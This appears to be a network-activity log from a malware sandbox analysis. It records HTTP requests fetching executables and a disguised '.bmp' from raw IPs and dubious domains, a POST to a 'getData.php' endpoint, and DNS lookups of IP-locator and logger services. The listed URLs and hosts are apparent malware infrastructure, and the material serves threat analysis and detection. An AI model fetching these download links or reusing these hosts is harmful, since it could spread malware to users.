GET http://37.0.10.244/download/NiceProcessX64.bmpHTTP Response
200 -
838 B 682 B 9 6
-
72.21.91.29:80http://statuse.digitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3Dhttp432 B 1.1kB 4 8
HTTP Request
GET http://statuse.digitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3DHTTP Response
200 -
812 B 6.2kB 9 8
-
594 B 1.2kB 6 4
-
779 B 4.3kB 8 7
HTTP Request
POST http://51.178.186.149/base/api/getData.phpHTTP Response
200 -
647 B 528 B 6 5
-
647 B 528 B 6 5
-
455 B 528 B 6 5
-
455 B 528 B 6 5
-
407 B 528 B 6 5
-
407 B 528 B 6 5
-
407 B 528 B 6 5
-
407 B 528 B 6 5
-
190 B 92 B 4 2
-
190 B 92 B 4 2
-
190 B 92 B 4 2
-
190 B 92 B 4 2
-
455 B 528 B 6 5
-
455 B 528 B 6 5
-
455 B 528 B 6 5
-
111.5kB 3.6MB 2412 2392
-
709 B 1.0kB 6 11
HTTP Request
HEAD http://www.invch.com/askhelp59/askinstall59.exeHTTP Response
404HTTP Request
GET http://www.invch.com/askhelp59/askinstall59.exeHTTP Response
404 -
23.0kB 715.7kB 487 485
-
495 B 5.5kB 7 15
-
14.0kB 419.2kB 290 287
-
112.5kB 3.6MB 2431 2416
-
407 B 528 B 6 5
-
453 B 568 B 7 6
-
407 B 528 B 6 5
-
190 B 92 B 4 2
-
190 B 92 B 4 2
-
190 B 92 B 4 2
-
59.7kB 1.9MB 1283 1274
-
10.4kB 302.8kB 211 209
-
148.7kB 4.8MB 3218 3198
-
459 B 488 B 5 4
HTTP Request
HEAD http://privacytoolz123foryou.top/downloads/toolspab2.exeHTTP Response
200 -
8.4kB 257.2kB 177 176
HTTP Request
GET http://privacytoolz123foryou.top/downloads/toolspab2.exeHTTP Response
200
-
56 B 88 B 1 1
DNS Request
hsiens.xyz
DNS Response
104.21.87.76172.67.142.91
-
64 B 80 B 1 1
DNS Request
www.listincode.com
DNS Response
144.202.76.47
-
64 B 144 B 1 1
DNS Request
cdn.discordapp.com
DNS Response
162.159.134.233162.159.130.233162.159.129.233162.159.135.233162.159.133.233
-
60 B 76 B 1 1
DNS Request
safialinks.com
DNS Response
162.0.214.42
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
61 B 93 B 1 1
DNS Request
c.goatgameh.com
DNS Response
104.21.89.157172.67.189.151
-
60 B 92 B 1 1
DNS Request
dependstar.bar
DNS Response
172.67.160.135104.21.14.200
-
62 B 78 B 1 1
DNS Request
activityhike.com
DNS Response
95.142.37.102
-
67 B 99 B 1 1
DNS Request
petrenko96.tumblr.com
DNS Response
74.114.154.1874.114.154.22
-
55 B 71 B 1 1
DNS Request
ipinfo.io
DNS Response
34.117.59.81
-
79 B 155 B 1 1
DNS Request
statuse.digitalcertvalidation.com
DNS Response
72.21.91.29
-
58 B 74 B 1 1
DNS Request
iplogger.org
DNS Response
88.99.66.31
-
59 B 75 B 1 1
DNS Request
www.invch.com
DNS Response
103.155.93.196
-
71 B 87 B 1 1
DNS Request
privacytoolz123foryou.top
DNS Response
45.144.67.29